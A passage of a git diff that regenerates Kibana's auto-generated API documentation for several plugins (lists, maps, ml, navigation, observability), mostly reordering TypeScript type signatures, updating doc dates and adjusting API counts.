| \"included\"; type: \"exists\"; 
} | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]" ], "path": "x-pack/plugins/lists/server/services/exception_lists/exception_list_client_types.ts", "deprecated": false 
@@ -3049,7 +3049,7 @@ "item exception entries logic" ], "signature": [ - "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]" + "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: 
string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]" ], "path": "x-pack/plugins/lists/server/services/exception_lists/exception_list_client_types.ts", "deprecated": false @@ -3697,7 +3697,61 @@ "label": "esClient", "description": [], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "GetResponse", + ", unknown>>; (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "GetResponse", + ">; }; delete: { (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "WriteResponseBase", + ">; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptionsWithMeta", + " | undefined): Promise<", + "TransportResult", + "<", + "WriteResponseBase", + ", unknown>>; (this: That, params: ", + "DeleteRequest", + " | ", + "DeleteRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined): Promise<", + "WriteResponseBase", + ">; }; cluster: ", + "default", + "; eql: ", "default", "; search: { >; }; cluster: ", - "default", - "; eql: ", - "default", - "; create: { (this: That, params: ", + ">; }; create: { (this: That, params: ", "CreateRequest", " | ", "CreateRequest", 
@@ -3765,7 +3815,7 @@ "default", "; security: ", "default", - "; index: { (this: That, params: ", + "; name: string | symbol; index: { (this: That, params: ", "IndexRequest", " | ", "IndexRequest", @@ -3791,33 +3841,7 @@ "TransportRequestOptions", " | undefined): Promise<", "WriteResponseBase", - ">; }; get: { (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "GetResponse", - ">; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "GetResponse", - ", unknown>>; (this: That, params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "GetResponse", - ">; }; update: { (this: That, params: ", + ">; }; update: { (this: That, params: ", "UpdateRequest", " | ", "UpdateRequest", 
@@ -3843,33 +3867,7 @@ "TransportRequestOptions", " | undefined): Promise<", "UpdateResponse", - ">; }; delete: { (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithOutMeta", - " | undefined): Promise<", - "WriteResponseBase", - ">; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptionsWithMeta", - " | undefined): Promise<", - "TransportResult", - "<", - "WriteResponseBase", - ", unknown>>; (this: That, params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", - " | undefined): Promise<", - "WriteResponseBase", - ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", + ">; }; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; 
[kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", "default", "; helpers: ", "default", @@ -4829,6 +4827,8 @@ "TermvectorsResponse", ">; }; textStructure: ", "default", + "; transform: ", + "default", "; updateByQuery: { (this: That, params: ", "UpdateByQueryRequest", " | ", diff --git a/api_docs/lists.mdx b/api_docs/lists.mdx index 932e2fa0b0335..16de39f551262 100644 --- a/api_docs/lists.mdx +++ b/api_docs/lists.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/lists title: "lists" image: https://source.unsplash.com/400x175/?github description: API docs for the lists plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'lists'] --- import listsObj from './lists.devdocs.json'; diff --git a/api_docs/management.mdx b/api_docs/management.mdx index cd4cf4dc77477..00e18485de783 100644 --- a/api_docs/management.mdx +++ b/api_docs/management.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/management title: "management" image: https://source.unsplash.com/400x175/?github description: API docs for the management plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'management'] --- import managementObj from './management.devdocs.json'; diff --git a/api_docs/maps.devdocs.json b/api_docs/maps.devdocs.json index 26f459392cbd9..3ec66d75cdeca 100644 --- a/api_docs/maps.devdocs.json +++ b/api_docs/maps.devdocs.json 
@@ -466,18 +466,16 @@ "type": "Function", "tags": [], "label": "getFilters", - "description": [ - "\nTODO: Implement this function once https://github.com/elastic/kibana/issues/91282 is resolved" - ], + "description": [], "signature": [ - "() => Promise" + "() => Promise<", + "Filter", + "[]>" ], "path": "x-pack/plugins/maps/public/embeddable/map_embeddable.tsx", "deprecated": false, "children": [], - "returnComment": [ - "[]" - ] + "returnComment": [] }, { "parentPluginId": "maps", @@ -485,18 +483,16 @@ "type": "Function", "tags": [], "label": "getQuery", - "description": [ - "\nTODO: Implement this function once https://github.com/elastic/kibana/issues/91282 is resolved" - ], + "description": [], "signature": [ - "() => Promise" + "() => Promise<", + "Query", + " | undefined>" ], "path": "x-pack/plugins/maps/public/embeddable/map_embeddable.tsx", "deprecated": false, "children": [], - "returnComment": [ - "undefined" - ] + "returnComment": [] }, { "parentPluginId": "maps", @@ -1348,6 +1344,23 @@ "path": "x-pack/plugins/maps/public/classes/sources/vector_source/vector_source.tsx", "deprecated": false }, + { + "parentPluginId": "maps", + "id": "def-public.BoundsRequestMeta.embeddableSearchContext", + "type": "Object", + "tags": [], + "label": "embeddableSearchContext", + "description": [], + "signature": [ + "{ query?: ", + "Query", + " | undefined; filters: ", + "Filter", + "[]; } | undefined" + ], + "path": "x-pack/plugins/maps/public/classes/sources/vector_source/vector_source.tsx", + "deprecated": false + }, { "parentPluginId": "maps", "id": "def-public.BoundsRequestMeta.sourceQuery", diff --git a/api_docs/maps.mdx b/api_docs/maps.mdx index 744668f133b6e..62b34eb2f20e1 100644 --- a/api_docs/maps.mdx +++ b/api_docs/maps.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/maps title: "maps" image: https://source.unsplash.com/400x175/?github description: API docs for the maps plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'maps'] --- import mapsObj from './maps.devdocs.json'; @@ -21,7 +21,7 @@ Contact [GIS](https://github.com/orgs/elastic/teams/kibana-gis) for questions re | Public API count | Any count | Items lacking comments | Missing exports | |-------------------|-----------|------------------------|-----------------| -| 255 | 0 | 252 | 25 | +| 256 | 0 | 255 | 25 | ## Client diff --git a/api_docs/maps_ems.mdx b/api_docs/maps_ems.mdx index 08d27dfc5d9e0..6434377f36f50 100644 --- a/api_docs/maps_ems.mdx +++ b/api_docs/maps_ems.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/mapsEms title: "mapsEms" image: https://source.unsplash.com/400x175/?github description: API docs for the mapsEms plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'mapsEms'] --- import mapsEmsObj from './maps_ems.devdocs.json'; diff --git a/api_docs/ml.devdocs.json b/api_docs/ml.devdocs.json index 234dc00a385fc..2e5a2b35f7c3a 100644 --- a/api_docs/ml.devdocs.json +++ b/api_docs/ml.devdocs.json 
@@ -1262,7 +1262,7 @@ }, " extends Pick<", "UseDataGridReturnType", - ", \"status\" | \"baseline\" | \"rowCount\" | \"errorMessage\" | \"chartsVisible\" | \"chartsButtonVisible\" | \"ccsWarning\" | \"columnsWithCharts\" | \"invalidSortingColumnns\" | \"noDataMessage\" | \"onChangeItemsPerPage\" | \"onChangePage\" | \"onSort\" | \"pagination\" | \"setPagination\" | \"setVisibleColumns\" | \"rowCountRelation\" | \"sortingColumns\" | \"tableItems\" | \"toggleChartVisibility\" | \"visibleColumns\" | \"predictionFieldName\" | \"resultsField\">" + ", \"status\" | \"rowCount\" | \"errorMessage\" | \"baseline\" | \"chartsVisible\" | \"chartsButtonVisible\" | \"ccsWarning\" | \"columnsWithCharts\" | \"invalidSortingColumnns\" | \"noDataMessage\" | \"onChangeItemsPerPage\" | \"onChangePage\" | \"onSort\" | \"pagination\" | \"setPagination\" | \"setVisibleColumns\" | \"rowCountRelation\" | \"sortingColumns\" | \"tableItems\" | \"toggleChartVisibility\" | \"visibleColumns\" | \"predictionFieldName\" | \"resultsField\">" ], "path": "x-pack/plugins/ml/public/application/components/data_grid/types.ts", "deprecated": false, diff --git a/api_docs/ml.mdx b/api_docs/ml.mdx index 19deff4d4fb3f..7f818d563723c 100644 --- a/api_docs/ml.mdx +++ b/api_docs/ml.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/ml title: "ml" image: https://source.unsplash.com/400x175/?github description: API docs for the ml plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'ml'] --- import mlObj from './ml.devdocs.json'; diff --git a/api_docs/monitoring.mdx b/api_docs/monitoring.mdx index 598255847b9a6..8d6d469746768 100644 --- a/api_docs/monitoring.mdx +++ b/api_docs/monitoring.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/monitoring title: "monitoring" image: https://source.unsplash.com/400x175/?github description: API docs for the monitoring plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'monitoring'] --- import monitoringObj from './monitoring.devdocs.json'; diff --git a/api_docs/monitoring_collection.mdx b/api_docs/monitoring_collection.mdx index a489ebc9a156e..3c7ee3e38fc86 100644 --- a/api_docs/monitoring_collection.mdx +++ b/api_docs/monitoring_collection.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/monitoringCollection title: "monitoringCollection" image: https://source.unsplash.com/400x175/?github description: API docs for the monitoringCollection plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'monitoringCollection'] --- import monitoringCollectionObj from './monitoring_collection.devdocs.json'; diff --git a/api_docs/navigation.devdocs.json b/api_docs/navigation.devdocs.json index 5e8590af0ad15..2e6c408e26aca 100644 --- a/api_docs/navigation.devdocs.json +++ b/api_docs/navigation.devdocs.json 
@@ -411,13 +411,13 @@ "DisambiguateSet", "<(", "DisambiguateSet", - " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">), WithSpanProps> & WithSpanProps & { iconType?: ", "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", @@ -427,13 +427,13 @@ "DisambiguateSet", "<(", "DisambiguateSet", - " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">), WithSpanProps> & WithSpanProps & { iconType?: ", "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", 
@@ -445,15 +445,15 @@ "DisambiguateSet", " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">)> & ", "DisambiguateSet", - " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\"> & { iconType?: ", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\"> & { iconType?: ", "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", 
@@ -463,15 +463,15 @@ "DisambiguateSet", " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">)> & ", "DisambiguateSet", - " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\"> & { iconType?: ", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\"> & { iconType?: ", "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", 
@@ -483,15 +483,15 @@ "DisambiguateSet", " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">)> & ", "DisambiguateSet", - " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\"> & { iconType?: ", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\"> & { iconType?: ", "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", @@ -503,7 +503,7 @@ "DisambiguateSet", " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">)> & ", "DisambiguateSet", 
@@ -511,7 +511,7 @@ "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", @@ -521,7 +521,7 @@ "DisambiguateSet", " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">)> & ", "DisambiguateSet", @@ -529,7 +529,7 @@ "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", @@ -541,7 +541,7 @@ "DisambiguateSet", " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"href\" | \"onClick\">) | (", + " & { href: string; target?: string | undefined; rel?: string | undefined; } & Omit, \"color\" | \"onClick\" | \"href\">) | (", "DisambiguateSet", " & { onClick?: React.MouseEventHandler | undefined; onClickAriaLabel?: string | undefined; } & Omit, \"color\" | \"onClick\">)> & ", "DisambiguateSet", 
@@ -549,7 +549,7 @@ "IconType", " | undefined; label: React.ReactNode; tooltipContent?: React.ReactNode; tooltipPosition?: ", "ToolTipPositions", - " | undefined; title?: string | undefined; color?: \"accent\" | \"subdued\" | \"hollow\" | undefined; size?: ", + " | undefined; title?: string | undefined; color?: \"subdued\" | \"accent\" | \"hollow\" | undefined; size?: ", "BetaBadgeSize", " | undefined; } & ", "DisambiguateSet", diff --git a/api_docs/navigation.mdx b/api_docs/navigation.mdx index 6294e351203b5..9c4935b2316b7 100644 --- a/api_docs/navigation.mdx +++ b/api_docs/navigation.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/navigation title: "navigation" image: https://source.unsplash.com/400x175/?github description: API docs for the navigation plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'navigation'] --- import navigationObj from './navigation.devdocs.json'; diff --git a/api_docs/newsfeed.mdx b/api_docs/newsfeed.mdx index 8a3e8514ed154..1ddeac3685504 100644 --- a/api_docs/newsfeed.mdx +++ b/api_docs/newsfeed.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/newsfeed title: "newsfeed" image: https://source.unsplash.com/400x175/?github description: API docs for the newsfeed plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'newsfeed'] --- import newsfeedObj from './newsfeed.devdocs.json'; diff --git a/api_docs/observability.devdocs.json b/api_docs/observability.devdocs.json index ec992224fa207..6e22546cd3174 100644 --- a/api_docs/observability.devdocs.json +++ b/api_docs/observability.devdocs.json 
@@ -696,11 +696,11 @@ }, " | undefined; list: () => string[]; }; selectedAlertId?: string | undefined; } & ", "CommonProps", - " & { as?: \"div\" | undefined; } & _EuiFlyoutProps & Omit, HTMLDivElement>, keyof _EuiFlyoutProps> & Omit, HTMLDivElement>, \"key\" | \"css\" | keyof React.HTMLAttributes> & { ref?: React.RefObject | ((instance: HTMLDivElement | null) => void) | null | undefined; }, \"children\" | \"color\" | \"id\" | \"lang\" | \"tabIndex\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | \"aria-busy\" | \"aria-checked\" | \"aria-colcount\" | \"aria-colindex\" | \"aria-colspan\" | \"aria-controls\" | \"aria-current\" | \"aria-describedby\" | \"aria-details\" | \"aria-disabled\" | \"aria-dropeffect\" | \"aria-errormessage\" | \"aria-expanded\" | \"aria-flowto\" | \"aria-grabbed\" | \"aria-haspopup\" | \"aria-hidden\" | \"aria-invalid\" | \"aria-keyshortcuts\" | \"aria-labelledby\" | \"aria-level\" | \"aria-live\" | \"aria-modal\" | \"aria-multiline\" | \"aria-multiselectable\" | \"aria-orientation\" | \"aria-owns\" | \"aria-placeholder\" | \"aria-posinset\" | \"aria-pressed\" | \"aria-readonly\" | \"aria-relevant\" | \"aria-required\" | \"aria-roledescription\" | \"aria-rowcount\" | \"aria-rowindex\" | \"aria-rowspan\" | \"aria-selected\" | \"aria-setsize\" | \"aria-sort\" | \"aria-valuemax\" | \"aria-valuemin\" | \"aria-valuenow\" | \"aria-valuetext\" | \"dangerouslySetInnerHTML\" | \"onCopy\" | \"onCopyCapture\" | \"onCut\" | \"onCutCapture\" | \"onPaste\" | \"onPasteCapture\" | \"onCompositionEnd\" | \"onCompositionEndCapture\" | \"onCompositionStart\" | \"onCompositionStartCapture\" | \"onCompositionUpdate\" | \"onCompositionUpdateCapture\" | \"onFocus\" | \"onFocusCapture\" | \"onBlur\" | \"onBlurCapture\" | \"onChange\" | \"onChangeCapture\" | \"onBeforeInput\" | \"onBeforeInputCapture\" | \"onInput\" | \"onInputCapture\" | \"onReset\" | \"onResetCapture\" | \"onSubmit\" | \"onSubmitCapture\" | \"onInvalid\" | 
\"onInvalidCapture\" | \"onLoad\" | \"onLoadCapture\" | \"onError\" | \"onErrorCapture\" | \"onKeyDown\" | \"onKeyDownCapture\" | \"onKeyPress\" | \"onKeyPressCapture\" | \"onKeyUp\" | \"onKeyUpCapture\" | \"onAbort\" | \"onAbortCapture\" | \"onCanPlay\" | \"onCanPlayCapture\" | \"onCanPlayThrough\" | \"onCanPlayThroughCapture\" | \"onDurationChange\" | \"onDurationChangeCapture\" | \"onEmptied\" | \"onEmptiedCapture\" | \"onEncrypted\" | \"onEncryptedCapture\" | \"onEnded\" | \"onEndedCapture\" | \"onLoadedData\" | \"onLoadedDataCapture\" | \"onLoadedMetadata\" | \"onLoadedMetadataCapture\" | \"onLoadStart\" | \"onLoadStartCapture\" | \"onPause\" | \"onPauseCapture\" | \"onPlay\" | \"onPlayCapture\" | \"onPlaying\" | \"onPlayingCapture\" | \"onProgress\" | \"onProgressCapture\" | \"onRateChange\" | \"onRateChangeCapture\" | \"onSeeked\" | \"onSeekedCapture\" | \"onSeeking\" | \"onSeekingCapture\" | \"onStalled\" | \"onStalledCapture\" | \"onSuspend\" | \"onSuspendCapture\" | \"onTimeUpdate\" | \"onTimeUpdateCapture\" | \"onVolumeChange\" | \"onVolumeChangeCapture\" | \"onWaiting\" | \"onWaitingCapture\" | \"onAuxClick\" | \"onAuxClickCapture\" | \"onClick\" | \"onClickCapture\" | \"onContextMenu\" | \"onContextMenuCapture\" | \"onDoubleClick\" | \"onDoubleClickCapture\" | \"onDrag\" | \"onDragCapture\" | \"onDragEnd\" | \"onDragEndCapture\" | \"onDragEnter\" | \"onDragEnterCapture\" | \"onDragExit\" | \"onDragExitCapture\" | \"onDragLeave\" | \"onDragLeaveCapture\" | \"onDragOver\" | \"onDragOverCapture\" | \"onDragStart\" | \"onDragStartCapture\" | \"onDrop\" | \"onDropCapture\" | \"onMouseDown\" | \"onMouseDownCapture\" | \"onMouseEnter\" | \"onMouseLeave\" | \"onMouseMove\" | \"onMouseMoveCapture\" | \"onMouseOut\" | \"onMouseOutCapture\" | \"onMouseOver\" | \"onMouseOverCapture\" | \"onMouseUp\" | \"onMouseUpCapture\" | \"onSelect\" | \"onSelectCapture\" | \"onTouchCancel\" | \"onTouchCancelCapture\" | \"onTouchEnd\" | \"onTouchEndCapture\" | \"onTouchMove\" | 
\"onTouchMoveCapture\" | \"onTouchStart\" | \"onTouchStartCapture\" | \"onPointerDown\" | \"onPointerDownCapture\" | \"onPointerMove\" | \"onPointerMoveCapture\" | \"onPointerUp\" | \"onPointerUpCapture\" | \"onPointerCancel\" | \"onPointerCancelCapture\" | \"onPointerEnter\" | \"onPointerEnterCapture\" | \"onPointerLeave\" | \"onPointerLeaveCapture\" | \"onPointerOver\" | \"onPointerOverCapture\" | \"onPointerOut\" | \"onPointerOutCapture\" | \"onGotPointerCapture\" | \"onGotPointerCaptureCapture\" | \"onLostPointerCapture\" | \"onLostPointerCaptureCapture\" | \"onScroll\" | \"onScrollCapture\" | \"onWheel\" | \"onWheelCapture\" | \"onAnimationStart\" | \"onAnimationStartCapture\" | \"onAnimationEnd\" | \"onAnimationEndCapture\" | \"onAnimationIteration\" | \"onAnimationIterationCapture\" | \"onTransitionEnd\" | \"onTransitionEndCapture\" | keyof ", + " & { as?: \"div\" | undefined; } & _EuiFlyoutProps & Omit, HTMLDivElement>, keyof _EuiFlyoutProps> & Omit, HTMLDivElement>, \"key\" | \"css\" | keyof React.HTMLAttributes> & { ref?: React.RefObject | ((instance: HTMLDivElement | null) => void) | null | undefined; }, \"children\" | \"onError\" | \"hidden\" | \"color\" | \"title\" | \"onChange\" | \"onKeyDown\" | \"onClick\" | \"id\" | \"security\" | \"defaultValue\" | \"lang\" | \"defaultChecked\" | \"suppressContentEditableWarning\" | \"suppressHydrationWarning\" | \"accessKey\" | \"contentEditable\" | \"contextMenu\" | \"dir\" | \"draggable\" | \"placeholder\" | \"slot\" | \"spellCheck\" | \"tabIndex\" | \"translate\" | \"radioGroup\" | \"about\" | \"datatype\" | \"inlist\" | \"prefix\" | \"property\" | \"resource\" | \"typeof\" | \"vocab\" | \"autoCapitalize\" | \"autoCorrect\" | \"autoSave\" | \"itemProp\" | \"itemScope\" | \"itemType\" | \"itemID\" | \"itemRef\" | \"results\" | \"unselectable\" | \"inputMode\" | \"is\" | \"aria-activedescendant\" | \"aria-atomic\" | \"aria-autocomplete\" | 